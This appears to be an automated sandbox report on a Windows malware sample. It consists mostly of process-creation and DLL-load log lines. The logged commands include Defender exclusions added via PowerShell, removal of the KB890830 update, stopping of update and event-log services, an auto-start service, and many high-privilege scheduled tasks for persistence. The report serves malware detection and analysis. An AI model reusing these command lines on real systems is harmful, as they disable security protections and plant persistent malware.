File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	ReversingLabs: Detection: 60%
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Virustotal: Detection: 69%

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File read: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe "C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\WmiPrvSE.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\RuntimeBroker.exe'" /f
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\KZcLqgnLvRf.exe"
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRf" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 11 /tr "'C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "IFAYFBKT" binpath= "C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "IFAYFBKT"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "IFAYFBKT"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
